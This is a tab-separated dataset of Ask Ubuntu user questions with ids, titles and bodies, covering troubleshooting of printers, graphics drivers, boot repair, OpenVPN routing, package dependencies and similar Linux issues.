445928	printer not communicating with pc	i did install hp printer driver yet its not communicating with printer when printing command is given when printing command is given its goes to printing queue and printing does not happen i did install the options as indicated in the ubuntu forum : like sudo gedit /etc/pnm2ppa.conf sudo /etc/init.d/hpoj setup and etc what could be the possible hiccup ?
445931	how to develop application for openstack	i have installed openstack and everywhere i see tutorials about installing and deploying but no example about how to develop a simple app on openstack ? using php can anyone guide me ?
445937	unable to run usb monitor at the same time as laptop monitor	i am having better luck than others at using e1649fwu monitor ; at least i can see my desktop , albeit not at the same time as on the other screen . ( see using aoc usb monitor on ubuntu for an existing unsolved issue ) i seem to be stuck at xorg configuration stage . i am unable to configure xorg to use both screens , laptop-internal and e1649fwu usb screen , at the same time . here 's some info to start with : laptop : macbook pro 9,1 usb monitor : aoc e1649fwu $ lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 12.04.4 lts release : 12.04 codename : precise $ uname -a linux work 3.11.0-19-generic # 33~precise1-ubuntu smp wed mar 12 21:16:27 utc 2014 x86_64 x86_64 x86_64 gnu/linux ( # latest kernel installed by `sudo apt-get install linux-image-generic-lts-saucy` ) $ nvidia-xconfig -- version nvidia-xconfig : version 331.20 ( buildmeister @ swio-display-x86-rhel47-05 ) wed oct 30 18:20:53 pdt 2013 the nvidia x configuration tool . following are hardware configurations i am trying , and the associated files i use as /etc/x11/xorg.conf . hardware configurations : laptop-only , xorg.conf.backup boot with usb monitor attached , xorg.conf.backup boot with usb monitor attached , xorg.conf.displaylink_nvidia the xorg.conf.displaylink_nvidia file was generated by nvidia-xconfig , and then i added 'displaylink ' settings to it . here 's the description of behaviour i see in the above configurations : in hw-config-1 i am able to see my ubuntu desktop , and work normally . no external screens , no complications . in hw-config-2 the usb monitor gets the initial boot-time ubuntu splash screen , complete with the dots under the logo changing color indicating progress . but the login screen , and the subsequent desktop , show up on the laptop screen . when switching to console mode by ctrl-alt- { 1,6 } the laptop screen goes blank and the usb montor shows those console-mode screens , which are perfectly usable ( the display does get garbled when i run less , but top and vim work just fine ) . i can easily switch back to gui desktop by ctrl-alt-7 , and the laptop screen shows the desktop while the usb screen freezes with whatever content it had at the time of switching . the framebuffer device shows up as /dev/fb0 crw-rw -- -- 1 root video 29 , 0 apr 9 17:56 /dev/fb0 ( also see images hw-config-2 . *.jpg at http : //gurjeet.singh.im/e1649fwu/ ) in hw-config-3 the boot sequence starts with laptop screen , but after it detects the usb screen , everything moves to that screen . the laptop screen is left with the initial boot-time warning messages , which never change . when switching to console mode and back to gui mode , using ctrl-alt- { 1,7 } , all activity happens on usb screen , and it all works flawlessly ! but no activity on the laptop screen . ( also see images hw-config-3 . *.jpg at http : //gurjeet.singh.im/e1649fwu/ ) i have uploaded the dmesg outputs and xorg.0.log files for the different hardware configurations at http : //gurjeet.singh.im/e1649fwu/ . i do n't see anything obviously wrong in those logs , except that in configuration-3 's xorg.0.log i see that xorg chooses to unload nvidia driver on line 163 .
445940	libglw1-mesa-dev have unmet dependencies , i got this error on ubuntu 12.04 lts	i got the following error on my ubuntu 12.04 lts .so far nothing works for me . i have tried following code sudo apt-get install csh tcsh libaudiofile-dev libglw1-mesa elfutils gamin libglw1-mesa-dev mesa-utils xfs xfstt ttf-liberation ttf-mscorefonts-installer xfonts-100dpi xfonts-75dpi alien the output is : the following packages have unmet dependencies : libglw1-mesa-dev : depends : libx11-dev but it is not going to be installed depends : mesa-common-dev ( > = 7.4~ ) e : unable to correct problems , you have held broken packages . please help
445944	apps in ubuntu touch	i have got a ubuntu touch os installed on my android phone . now my first question is how to develop an app . and my second question is how to install any app on my ubuntu touch ? please help ! ! !
445946	what are the important xml files ? ( accidentally moved all xml files )	very unfortunately i have moved all my xml files into one folder ( i was at /home/desgua/ when i run find . -name '*.xml ' -exec mv { } ./logs/ \ ; . now i am very afraid of turning off my computer and not be able to turn it on again . i have my /home/desgua/ folder encrypted during the installation . is there any essential xml file that i should be aware of ? ps . : one example of fundamental xml file is `` .encfs6.xml '' , which are required to mount two folders that i had encrypted . fortunately i recovered it . edit : i rebooted the computer and although i have lost the configuration of applications and keyboard shortcuts i was able to login again . so i can say that no xml file is needed to login into an ubuntu encrypted home .
445949	how to increase pinging rate ?	is there a way to increase the pinging rate on ubuntu 10.04 ? ping routerip thanks .
445954	unable to open /etc/ati/control , please reinstall the driver	i had the beta drivers running previously and after a standard update it stopped working . what i 've tried so far : sudo apt-get remove -- purge fglrx* then downloaded drivers from amd website and unzipped it and ran : sudo ./amd-driver-installer-catalyst-13-4-x86.x86_64.run -- buildpkg ubuntu/trusty sudo dpkg -i fglrx*.deb after this the ubuntu binarydriverhowto/amd guide wants to make this : aticonfig -- initial and it returns : unable to open /etc/ati/control , please reinstall the driver . aticonfig : no supported adapters detected the adapter is 280x and as said , it worked previously with the same drivers and with the same installation procedure . any ideas ?
445955	compiz using high cpu	i 'm running ubuntu desktop 13.10 with vga compatible controller : nvidia corporation gt218 [ geforce 210 ] ( rev a2 ) i 've tried installing the : sudo apt-get install nvidia-current i 've tried the http : //followthegeeks.com/compiz-is-consuming-too-much-cpu-heres-the-solution/ thing . but it still uses over 50 % of the cpu.. do someone know of a driver or fix for my problem ? ca n't find any driver for this specific nvidia card.. the solutions above are from other askubuntu questions . update : additional information : $ /usr/lib/nux/unity_support_test -p opengl vendor string : nvidia corporation opengl renderer string : geforce 210/pcie/sse2 opengl version string : 3.3.0 nvidia 304.88 not software rendered : yes not blacklisted : yes glx fbconfig : yes glx texture from pixmap : yes gl npot or rect textures : yes gl vertex program : yes gl fragment program : yes gl vertex buffer object : yes gl framebuffer object : yes gl version is 1.4+ : yes unity 3d supported : yes also did the unity_supported_test -c -p compiz supported : yes should some of these be no ?
445956	ca n't install sublime text from a .deb file	when i try to install sublime text 3 from a downloaded .deb file i get errors : the installation or removal of a software package failed and data files for some packages could not be downloaded the following packages requested additional data downloads after package installation , but the data could not be downloaded or could not be processed . ttf-mscorefonts-installer this is a permanent failure that leaves these packages unusable on your system . you may need to fix your internet connection , then remove and reinstall the packages to fix this problem . despite sudo apt-get install ttf-mscorefonts-installer ( ... ) ttf-mscorefonts-installer is already the newest version . can i omit somehow this problematic software center ? [ edit ] it seems it is possible to omit software center : sudo dpkg -i deb_package
445957	why do n't my lightdm.conf edits affect my desktop screen resolution ?	i wanted to change my desktop screen resolution to 1366x768 . but my vesa drivers ( amd redwood ) did not detect that resolution . so i created a shell script as follows : - xrandr -- newmode `` 1368x768_60.00 '' 85.25 1368 1440 1576 1784 768 771 781 798 -hsync +vsync xrandr -- addmode dvi-0 1368x768_60.00 xrandr -- output displayport-0 -- off -- output dvi-0 -- mode 1368x768_60.00 -- pos 0x0 -- rotate normal -- output hdmi-0 -- off i saved it as lightdmxrandr.sh in /usr/bin and made it executable . then i added the following lines to /usr/share/lightdm/lightdm.conf.d/50-ubuntu.conf ( which is the equivalent of the well known /etc/lightdm/lightdm.conf . i am using the above file as i am on 14.04 where there is no /etc/lightdm/lightdm.conf . ) : - greeter-session=unity-greeter display-setup-script=/usr/bin/lightdmxrandr.sh session-setup-script=/usr/bin/lightdmxrandr.sh and saved it . in theory this should have changed both the login screen resolution and desktop screen resolution to 1366x768 . but surprisingly this changed only the login screen resolution . the desktop resolution was not changed . later i added the script to startup applications and that changed my desktop resolution . so i want to know why the edits i made to lightdm.conf file ( or rather the 50-ubuntu.conf file ) did not affect my desktop resolution . is this some kind of bug that has to be reported at launchpad or is it wrong to say that edits in lightdm will affect desktop screen ? ps : - in my opinion this is not just specific to ubuntu 14.04 .
445958	unable to boot ubuntu 12.04 ; after new-installation	i am new at ubuntu and have just installed ubuntu 12.04 in a second partition ; the first partition being windows 7 . the installation was without problems ; then by re-start appears gnu grub on the screen and there are 5 options , the first two regarding ubuntu and ubuntu recovery . i tried both of them and the result was : 2,2979211 kernel panic not syncing : no init found . try passing init opt to kernel . see linux documentation/init.txt for guidance . i am still able to work with windows 7 on the first partition , but i am not able to start the new installed ubuntu . as i am totally new at linux , ubuntu and have no idea how both gnu grub or bios work , i would appreciate your advise . thank you ! mary
445959	youtube occasionally giving black screen	i know that there were many questions about youtube giving blackscreen , but i went through a lot of them on none was my problem . i am using chrome 32bit , basically , youtube sometimes stops working for me , giving a black screen in the place of the video , without any controls or anything . i tried using only pepper flash , only adobe-flashplugin and both at the same time and it did n't work . the thing is , after some time it starts working again all by itself , without me changing pretty much anything . which is completely bizarre , a bug that starts and stops happening all by itself , without any apparent connection to what am i doing on my computer . also , everything else flash related works on other sites and i tried switching to html5 version on youtube.com/html5 with still no success .
445960	syncevolution remove address database	i want to remove my address book database and start fresh with a new google contacts sync . how do i remove it ?
445961	scripting downloaded programs	i downloaded a game for fun and i would like to add it as part of my code for my butler program . say i have the game moon-buggy and i would have this code run it . if [ $ word = `` buggy '' ] then moon-buggy # i do not know how i would run a program like this . so i just put the program name where i think it would go .
445963	heartbleed bug in ubuntu 13.04	i need to update openssl to fix heartbleed bug i am not able to update the openssl . i have done apt-get update apt-get install libssl1.0.0 openssl but still openssl not updating please help me to resolve this issue .
445964	repairing windows 8 installation via ubuntu	my hdd is on its verge of death and i have windows 8 installed on it . i have some pretty important files there that i need to take to the ubuntu side . my ubuntu installation is on its separate physical hard drive . when i click one of my windows 8 partitions via ubuntu ( there are two ) , i get this error message : error mounting /dev/sdb1 at /media/dugi/store : command-line `mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , dmask=0077 , fmask=0177 '' `` /dev/sdb1 '' `` /media/dugi/store '' ' exited with non-zero exit status 14 : the disk contains an unclean file system ( 0 , 0 ) . metadata kept in windows cache , refused to mount . failed to mount '/dev/sdb1 ' : operation not permitted the ntfs partition is in an unsafe state . please resume and shutdown windows fully ( no hibernation or fast restarting ) , or mount the volume read-only with the 'ro ' mount option . is there a way i can fix or backup my important data from this hdd via ubuntu ? it 's the only way i have direct access to these hdds - the windows 8 system wont boot anymore . help would be appreciated .
445966	install compass 1 pre fails	i can not install compass version 1 . $ ruby -v ruby 1.9.3p0 ( 2011-10-30 revision 33570 ) [ x86_64-linux ] and when i do : $ sudo gem install compass -- pre i get following error : building native extensions . this could take a while ... error : error installing compass : error : failed to build gem native extension . /usr/bin/ruby1.9.1 extconf.rb /usr/lib/ruby/1.9.1/rubygems/custom_require.rb:36 : in `require ' : can not load such file -- mkmf ( loaderror ) from /usr/lib/ruby/1.9.1/rubygems/custom_require.rb:36 : in `require' from extconf.rb:4 : in ` < main > ' gem files will remain installed in /var/lib/gems/1.9.1/gems/ffi-1.9.3 for inspection . results logged to /var/lib/gems/1.9.1/gems/ffi-1.9.3/ext/ffi_c/gem_make.out any idea how to fix this ? i 'm using ubuntu 12.04 lts .
445973	can not get any flavor of linux to install	machine is a gateway turion ( single core 64 bit ) with 2 gb ram and 120 gb hard drive . i asked this in a previous question here , but i now have another day of trying things so i can report/ask better questions , i hope . ubuntu , mint and lubuntu all lock at approximately 75-80 % into the install . when i say lock , i mean the mouse dies , the cursor stops revolving and the keyboard is locked out . a power off is all that will work . i tried both live cd and install on both 32 and 64-bit verified cds . i found hardware test when booted from the cd , ran that , and the primary tests for computer , disk and memory all passed . ( no failures , but skipped unimportant tests ) i changed the bios settings to remove any auto magic like sleep , screen dimming or the like . from the cd , i can edit and save files to the hard drive , so i assume it is formatted/partitioned properly . i turned off the broadcom wireless , connected a network cable so it would have internet access ( works fine ) , and tried to install again . same issue.. 75-80 % in , lockup . tried mint , lockup . tried lubuntu , lockup . all look suspiciously similar in their install programs . is there a way to install the full install from terminal , or at least use a -verbose tag or the like so i can see what the install is hanging up on ? < -- never answered i tried to create a bootable usb , and that also failed at 34 % , but i had an idea of creating the bootable disk on the hard drive , which showed up in the utility . is this possible ? < -- never answered here , though found the answer this is very frustrating . i was able to install and run freebsd with no issues , so there has to be some way to get the os onto the hard drive ! initial problem solved : see answer below .
445974	how to get l2tp vpn client working ( xl2tpd fails ) ?	i 'm trying to get an l2tp vpn setup . i 'm using the l2tpipsecvpn gui . i 've got my connection setup , but when i try to connect , i get this log : apr 10 08:24:59.034 ipsec_setup : stopping openswan ipsec ... apr 10 08:25:00.258 ipsec_setup : starting openswan ipsec u2.6.37/k3.11.0-15-generic ... apr 10 08:25:00.574 starting xl2tpd : invoke-rc.d : initscript xl2tpd , action `` start '' failed . apr 10 08:25:00.575 [ error 1 ] command 'invoke-rc.d xl2tpd start ' failed and exited with given error code when i simply try to just run the command from the command line i get this error : $ sudo invoke-rc.d xl2tpd start $ ? 103 % # 4 7:51:05 sh : 0 : getcwd ( ) failed : no such file or directory sh : 0 : getcwd ( ) failed : no such file or directory starting xl2tpd : invoke-rc.d : initscript xl2tpd , action `` start '' failed . what 's going on here and how can i get it working ?
445976	how to use vmware on multiple displays ?	i am using three displays on my lubuntu 13.04 host machine ( geforce gtx 690 ) . i need to run many virtual machines and have been using virtualbox lately . now i 've decided to install vmware . everything was great : installed several vms , set up shared folders and so on . everything was great until i tried to drag the window with a vm to another display . it turns out vmware is not displaying guest desktop on secondary displays ! when i start machine on a secondary display i can see it downloading and than hanging . when i drag the window to the primary display i see that machine downloaded . tried both vmware workstation and player . all the same . how do i get this working seamlessly on multiple displays ?
445977	dock ( docky ) disappears when i put my computer to sleep	my dock disappears when i put the computer to sleep . it 's there when i go to sleep , but gone when i wake it up . i can easily start the dock again by using unity search and searching for `` docky '' and clicking the icon . the app then starts again . but i do n't want to have to do this every time ! it 's annoying . pardon my english , i am italian . computer specs : make : lenovo model : thinkpad r61 features : bluetooth , wifi , thinklight , etc . reply with answers/any questions .
445979	mount sd-card image ( created using dd )	i have created an image of my raspberry pi sd-card using dd : sudo dd if=/dev/sdf of=/home/myusername/raspberry-backup-2014-04-10.img the sd-card includes two partitions ( one vfat , one ext4 ) which are automatically mounted when i plug the card in . my question : how can i mount these partitions from the .img file ? more details : $ fdisk -l raspberry-backup-2014-04-10.img disk raspberry-backup-2014-04-10.img : 3974 mb , 3974103040 bytes 255 heads , 63 sectors/track , 483 cylinders , total 7761920 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000981cb device boot start end blocks id system raspberry-backup-2014-04-10.img1 8192 122879 57344 c w95 fat32 ( lba ) raspberry-backup-2014-04-10.img2 122880 7761919 3819520 83 linux
445980	absolute basic mq wanted - command line driven	i am looking to install a very basic command line accessible mq product . it will be run on ubuntu 12.04 lts , and should be able to support multiple readers . any products i should be looking at ?
445988	explain this shell redirection : uuencode host-file < host-file > encodedfile	how the below shell redirection works ? appears to be complicated to understand the order of execution . any easy explanation ? uuencode host-file < host-file > encodedfile
445989	problem with browser flash plugin	youtube video does not work properly ( see image ) . how can i fix this ?
445994	is wubi free to download ?	is wubi freely available ? i checked the link to download wubi and the only way to proceed is by giving some amount as donation . i will surely do it , but i do n't have a paypal account and i am in urgent need to install ubuntu . can someone help me ?
445997	how to convert android 's contacts2.db to .vcf ?	i have extracted my contacts2.db from a nandroid backup . i 'd like to convert that to one or many .vcf files so that i can use my contacts in other applications . i already found an answer that dealt with .db files but it did not work for this . i do n't know if i did something wrong .
446002	help gnome-panel	when i install ubuntu 13.10 updating , i did not get upper bar i have this problem with gnome-panel . ( gnome-panel:6959 ) : gtk-critical ** : gtk_accelerator_parse_with_keycode : assertion 'accelerator ! = null ' failed ** ( gnome-panel:6959 ) : warning ** : unable to parse mouse modifier ' ( null ) ' ( gnome-panel:6959 ) : gtk-critical ** : gtk_accelerator_parse_with_keycode : assertion 'accelerator ! = null ' failed ** ( gnome-panel:6959 ) : warning ** : unable to parse mouse modifier ' ( null ) ' *** bug *** in pixman_region32_init_rect : invalid rectangle passed set a breakpoint on '_pixman_log_error ' to debug *** bug *** in pixman_region32_init_rect : invalid rectangle passed set a breakpoint on '_pixman_log_error ' to debug *** bug *** in pixman_region32_init_rect : invalid rectangle passed set a breakpoint on '_pixman_log_error ' to debug i do not know nothing about computer , what can i do ?
446003	route traffic throught openvpn	before i ask my question , let me clarify for dear moderators that i 've searched a lot for a solution , but none of the questions/answers on askubuntu ( and other stackexchange sites ) addresses my problem . i 've set up openvpn on a debian server and also on my ubuntu host , and now i 'm trying to route all traffic ( except dhcp ) at client-side through openvpn tunnel . i read almost all guides on the web with no success . i read this , this , this , this , this , this , this , this , this , and some other guides and articles . and none of them resolved the porblem . if i use redirect-gateway def1 command at my client.conf ( or push it from server-side ( server.conf ) ) , at client-side i can not resolve domain names to ips ( basically dns queries fail ) , but i can ping public ( valid ) ips e.g . google 's dns server ( from my client host ) . here is my server.conf : proto udp port 1194 dev tun ca ca.crt cert myserver.crt key myserver.key dh dh1024.pem server 10.8.0.0 255.255.255.0 ifconfig-pool-persist ipp.txt duplicate-cn keepalive 10 120 comp-lzo persist-key persist-tun status openvpn-status.log log openvpn.log verb 3 and here 's my client.conf : client dev tun proto udp remote x.x.x.x 1194 nobind persist-key persist-tun mute-replay-warnings ca ca.crt cert client1.crt key client1.key ns-cert-type server comp-lzo verb 3 redirect-gateway def1 bypass-dns bypass-dhcp on the server side , i also issued the following command ( to nat the incoming openvpn traffic ) : iptables -t nat -a postrouting -s 10.8.0.0/24 -o eth0 -j masquerade here are the log and openvpn-status.log . update : if i use te following command at server side ( redirecting dns queries ) mentioned here , the problem gets resolved ( apparently ) , but how can i make sure that the traffic is going through the vpn link ? iptables -t nat -a prerouting -i tun+ -p udp -- dport 53 -j dnat -- to-destination 8.8.8.8
446004	pecl install zip giving error ubuntu 12.04	i am trying to install zip using this command pecl install zip but i am getting below error running : make /bin/bash /tmp/pear/temp/pear-build-root9lqspb/zip-1.12.4/libtool -- mode=compile cc -i . -i/tmp/pear/temp/zip -dphp_atom_inc -i/tmp/pear/temp/pear-build-root9lqspb/zip-1.12.4/include -i/tmp/pear/temp/pear-build-root9lqspb/zip-1.12.4/main -i/tmp/pear/temp/zip -i/usr/include/php5 -i/usr/include/php5/main -i/usr/include/php5/tsrm -i/usr/include/php5/zend -i/usr/include/php5/ext -i/usr/include/php5/ext/date/lib -d_largefile_source -d_file_offset_bits=64 -i/tmp/pear/temp/zip/lib -dhave_config_h -g -o2 -c /tmp/pear/temp/zip/php_zip.c -o php_zip.lo libtool : compile : cc -i . -i/tmp/pear/temp/zip -dphp_atom_inc -i/tmp/pear/temp/pear-build-root9lqspb/zip-1.12.4/include -i/tmp/pear/temp/pear-build-root9lqspb/zip-1.12.4/main -i/tmp/pear/temp/zip -i/usr/include/php5 -i/usr/include/php5/main -i/usr/include/php5/tsrm -i/usr/include/php5/zend -i/usr/include/php5/ext -i/usr/include/php5/ext/date/lib -d_largefile_source -d_file_offset_bits=64 -i/tmp/pear/temp/zip/lib -dhave_config_h -g -o2 -c /tmp/pear/temp/zip/php_zip.c -fpic -dpic -o .libs/php_zip.o in file included from /tmp/pear/temp/zip/php_zip.c:30:0 : /usr/include/php5/ext/pcre/php_pcre.h:29:18 : fatal error : pcre.h : no such file or directory compilation terminated . make : *** [ php_zip.lo ] error 1 error : `make ' failed any idea what is wrong ? thanks
446007	boot repair does n't work after windows 8.1 update	( the original title of this post was `` boot repair does n't work after april 2014 windows 8.1 update '' since i wanted to highlight that this is not about the 8.0 - > 8.1 update , but the update for 8.1 that came out in april 2014 . ) i 'm dual booting ubuntu 13.10 and windows 8.1 . today i got the `` big '' windows 8.1 update and now my pc does n't show grub anymore , but boots straight into windows . i 've tried running boot repair from ubuntu on a usb stick , but that does n't seem to do anything . the system still boots directly into windows every time . i 'm sure i just need to change some setting in boot repair , but i do n't want to do that without knowing what i 'm doing . : ) here 's my boot repair ubuntu pastebin thingy : http : //paste.ubuntu.com/7230979/ thanks ! update : now i effed everything up completely . since i did n't get an answer here , i tried fiddeling with the boot repair options . now the following message flashes for a second when i start the pc : could not open `` \efi\boot\fallback.efi '' : 14 failed to open \efi\boot\grubx64.efi - 800000000000000e failed to load image failed to open \efi\boot\mokmanager.efi - 800000000000000e failed to load image ... just before stopping at this line : operating system not found here 's my updated boot repair report : http : //paste.ubuntu.com/7233853/
446014	how to fix webcam quality in skype	i skype call a xyz person , the person i am talking is not able to see my clear video . it 's very dull & black . how can i fix it ? the video quality is to bad . i also referred to this guide ( https : //help.ubuntu.com/community/skype ) but no change the video is still the same . following these instructions : uvcdynctrl -s 'backlight compensation ' 7 uvcdynctrl -cv guvcview -o
446016	my usb drive is not working	i inserted my sandisk cruzor blade ( 4 gb ) into my ubuntu laptop few days ago and formatted it . and a message appeared : unable to mount your drive . now when i insert the usb drive into it , it does not recognize it at all . please help me to make the drive usable .
446017	how do we test after upgrading to 1.0.1-4ubuntu5.12 ( any possible testing commands to know the configuration works after upgrade ? ) ?	how do we test after upgrading to 1.0.1-4ubuntu5.12 ( any possible testing commands to know the configuration is working right after upgrade ) ? also note i had to reboot server after reboot : when tried to login via ssh after upgrade got message : system restart required
446020	realtek 802.11n rtl8192s usb wlan not connecting	like so many others i am having problems with my wireless adaptor . i am also new to linux from windows and i 'm not sure how to proceed . when i check the network connections the adaptor can see the networks to connect to , but constantly asks for the network key ( password ) but does n't connect . it was working fine with xp home edition , when i inserted the driver disc for the adaptor only text files showed up ? i 'm a mswindows 'blonde ' and need some hand-holding please , i 'm totally unfamiliar with the terminal . many thanks for your patience and answer in advance , david
446024	sending sound only through hdmi ( kubuntu )	so i am a new user to ubuntu coming from windows , and i wanted to connect my pc to the tv via hdmi . i have and it works perfectly , however , i have the sound coming from both the tv and the pc and it gets annoying . i try disabling the sound on the pc , it does so on the tv as well . it has some latency between tv and pc which makes it annoying . on windows i 'd use win & p buttons , and the sound would be transported to the second screen along with the image . i can transport the image only using the fn and f4 buttons ( i 've read this on another post ) but the sound keeps coming out from both outputs . any advice ? : )
446026	installing ubuntu from one partition to another ?	can i install ubuntu live on a partition on my hard drive with unetblootin but then install from there to another partition on the same hard drive ?
446030	webcam not working on sony vaio with 12.04	i 'm new to ubuntu , literally installed it yesterday , but enjoying it so far ! except for this issue with the webcam , which is not working at all . i 've been through the questions and answers here , and elsewhere , to no avail . the webcam appears to be showing with lsusb : bus 001 device 003 : id 05ca:1830 ricoh co. , ltd visual communication camera vgp-vcc2 [ r5u870 ] the kernel version is : 3.11.0-19-generic i 've tried installing the r5u87x but that has n't worked - i 'm pretty sure i need the r5u870 . so i tried that here but i get this fatal error : linux/videodev.h : no such file or directory nopalita @ picante : ~/r5u870 $ make make -c /lib/modules/3.11.0-19-generic/build m=/home/nopalita/r5u870 v=0 modules make [ 1 ] : entering directory `/usr/src/linux-headers-3.11.0-19-generic' cc [ m ] /home/nopalita/r5u870/r5u870.o in file included from /home/nopalita/r5u870/r5u870.c:60:0 : /home/nopalita/r5u870/usbcam/usbcam.h:38:28 : fatal error : linux/videodev.h : no such file or directory compilation terminated . make [ 2 ] : *** [ /home/nopalita/r5u870/r5u870.o ] error 1 make [ 1 ] : *** [ _module_/home/nopalita/r5u870 ] error 2 make [ 1 ] : leaving directory `/usr/src/linux-headers-3.11.0-19-generic' make : *** [ all ] error 2 and after a fresh install of 12.04 , and following the instructions the comments below ( which seemed to install ok ) , using `` sudo modprobe r5u870 '' i now get an error saying that the module can not be found ? fatal : module r5u870 not found . http : //pastebin.ubuntu.com/7234919/ i 'm now completely out of ideas . any suggestions ?
446032	why do desktop / monitor screens fail after staying logged in overnight ?	i am currently running ubuntu 13.10 . i experienced this same issue with ubuntu 12.04 , so i dont believe the following issue is tied to a specific release . i am using ubuntu for work , by choice . id like to stay logged in overnight , so that i can immediately resume my work when i arrive the next morning . unfortunately , when i arrive the next day , i often get this issue where any mouse movement or keyboard input results in a flashing/flickering screen , and i cant type in my password for gnome-screensaver . i try going to tty4 , restarting unity ( which , in 13.10 , now says `` restart is deprecated '' ... derp ) , restarting lightdm , restarting compiz , you name it . nothing works . everything i try either has no effect , or produces some unhelpful error message that equates to `` nope . '' i am always forced to `` sudo reboot '' from tty4 , which isnt the end of the world , but its leaving me thinking ubuntu 12.04+ is about as reliable as a microsoft product ( i have many other reasons for this opinion ) . i have been trying to troubleshoot this issue for about 7 months to no avail . previously , my employer gave me a craptacular machine which could barely run ubuntu 12.04 . i ended up believing the issue was due to running a modern os on an outdated machine . i couldnt even run a virtual machine for testing software updates , which was my only viable argument in getting a new computer . i finally convinced my employer to get me a new machine . this one has 8g ram , brand new 1tb hd , quad core 3.2ghz i7 , etc - its decent for work ( note : no video card , but that shouldnt matter cuz i just write web dev software ) . i installed ubuntu 13.10 on this machine . i still have the same exact problem . i usually just have sublime text 2 , and 3 gnome-terminal sessions open to my internal development server left open overnight . i lock my screen as i leave for the day , and am using gnome-screensaver ( the default black screen ) . ive gone through debug log , kernel log , syslog , xorg log , lightdm log , apport log , even faillog , and nothing strikes me as out of the ordinary . at most , the syslog prints tons of the following error overnight : < time > < hostname > : whoopsie [ < id > ] : online < time > whoopsie [ < id > ] : last message repeated < 2/3 > times on the old outdated machine ( 12.04 ) , there were lots of errors with gnome-screensaver , which led me to conclude that the machine diddnt have enough video memory to reload the desktop after some issue with the screensaver ( sounds crazy , but hey im no expert ) . on this new machine , there are no such logs concerning gnome-screensaver , so there goes my theory . another oddity is i have been using ubuntu for my home workstation since 12.04 was released , and have never experienced this issue . my home machine is pretty heavy duty in regards to video card , memory , disk space , nice motherboard , etc . i am currently running 13.04 at home ( afraid to upgrade due to all the bugs in 13.10 that are also said to be present in the upcoming 14.04 ) . if it werent for my positive experience with my home machine , id ditch ubuntu altogether . not being able to keep my machine logged in overnight is driving me away from canonical products . i seriously cant afford to continue losing time at work with buggy operating system issues . im that 'weirdo ' in the office that chooses to use linux , so people arent fond of my technical differences as it is . fedora / centos with gnome 3 is looking very nice these days . can anyone help me figure out why staying logged in overnight results in flickering screen , unusable peripherals , and a broken environment ? { update 7/17/2014 } hadnt had time to look into this for a while ( this is my work machine afterall ) , but last night left my machine on with gnome-screensaver up overnight , and my system monitors showed low memory usage when i left for the evening . came back today and memory has 1.7g in use and 5.3g cached , which is pretty much all of it . i then examined htop , and sorted the list by memory use . sure enough , there are 5 lightdm processes , and each of them uses a ton of memory . here is the output : pid user pri ni virt res shr s cpu % mem % time+ command 1078 root 20 0 2880m 2342m 2319m s 0.7 29.6 8:39.44 /usr/bin/x -core :0 -auth /var/run/lightdm/root/:0 -nolisten tcp vt7 -novtswitch 1117 root 20 0 2880m 2342m 2319m s 0.7 29.6 0:02.92 /usr/bin/x -core :0 -auth /var/run/lightdm/root/:0 -nolisten tcp vt7 -novtswitch 1118 root 20 0 2880m 2342m 2319m s 0.0 29.6 0:01.33 /usr/bin/x -core :0 -auth /var/run/lightdm/root/:0 -nolisten tcp vt7 -novtswitch 1119 root 20 0 2880m 2342m 2319m s 0.0 29.6 0:00.74 /usr/bin/x -core :0 -auth /var/run/lightdm/root/:0 -nolisten tcp vt7 -novtswitch 1120 root 20 0 2880m 2342m 2319m s 0.0 29.6 0:00.00 /usr/bin/x -core :0 -auth /var/run/lightdm/root/:0 -nolisten tcp vt7 -novtswitch ... a few other things with low memory usage follow ... is this normal ? ill continue monitoring this , but i have a feeling these many lightdm processes are the culprit , and their collective memory usage is startlingly high . can anyone shed some further light on this ( no pun intended ) ?
446033	ubuntu on galaxy tab	i would like to install ubuntu on a samsung galaxy tab 3 ( wifi ) . while preparing for this i need ( for the case restoring of android is necessary ) to know the name of the factory image for galaxy tab 3 ( as e.g . `` android 4.4 ( krt16m ) '' for `` nexus 5 ( gsm/lte ) '' ) . and where to get this factory image , since this is not described on the ubuntu web pages . can anybody help ? thanks and regards , werner
446036	problems with steam after playing games	i have a problem with my steam client here.i open steam and play a few hours of dota2 , but after i 'm done.. it takes more than 5 minutes to close and slows down my overall system performance . is there any way to rectify this problem .
446040	after installing xserver-xorg-core laptop wo n't boot	so i was trying to figure out how to install the proprietary intel drivers for my laptop and found i needed to install xserver-xorg-video-intel . when i tried installing that i was told i needed to install xserver-xorg-core first . so i installed both and rebooted and now ubuntu wo n't boot . it shows the ubuntu logo then the screen goes black . i am in recovery mode now . i removed both packages . however it still wo n't boot . what can i do to get the gui working again ? ! thanks i am using the dell xps 13 developer edition with 12.04 lts
446041	setting terminal tab titles	i 'm trying to open up a few terminal tabs in gnome-terminal , and so far i 've managed to do something , but i 'm stuck now . so , i have the following requirement : open tabs titled `` x '' and `` y '' execute some commands keep the tabs open and ready for further use ; keep the title . so far , i managed to meet some of the requirements , but not all of them : gnome-terminal -- tab -t `` x '' -e `` bash '' -- tab -t `` y '' -e `` top '' this opens two tabs : '' x '' ( and then changes the title to the default title ) '' y '' , but the tab closes as soon as i quit top . is there a way to open up a tab , launch bash , but not change the title ? i 've tried google , but gave up . edit : it does n't has to be a command .
446042	how to eneter single user mode ubuntu 12.04 lts	i installed ubuntu 12.04lts precise pangolin without a hitch . asked me to remove cd and restart which i did then i can not get past welcome to yaboot version 1.3.16 boot : i want to fix the issues with my graphics i 'm running a ppc imac 800 running linux nomodeset single i get an error no such file or directory thanks for any help . ( i did go through all the ppc facts and i think i tried everything there )
446055	how instal ubuntu on an empty computer	i want to instal ubuntu on a computer where nothing is instaled on . the computer is totaly emtpty . i thought i put it on a hardrive and instal the hardrive in my pc . im not so good whit computers . so how can i instal ubuntu on an empty computer ?
446057	converting .ovpn file to these 3 files : ca.crt , client.crt , client.key	vpnbook.com offers a free openvpn service . this is one of their files : http : //paste.ubuntu.com/7231382/ with the name vpnbook-uk1-tcp80.ovpn . i want to convert it to 3 files to be usable in network-manager-openvpn :
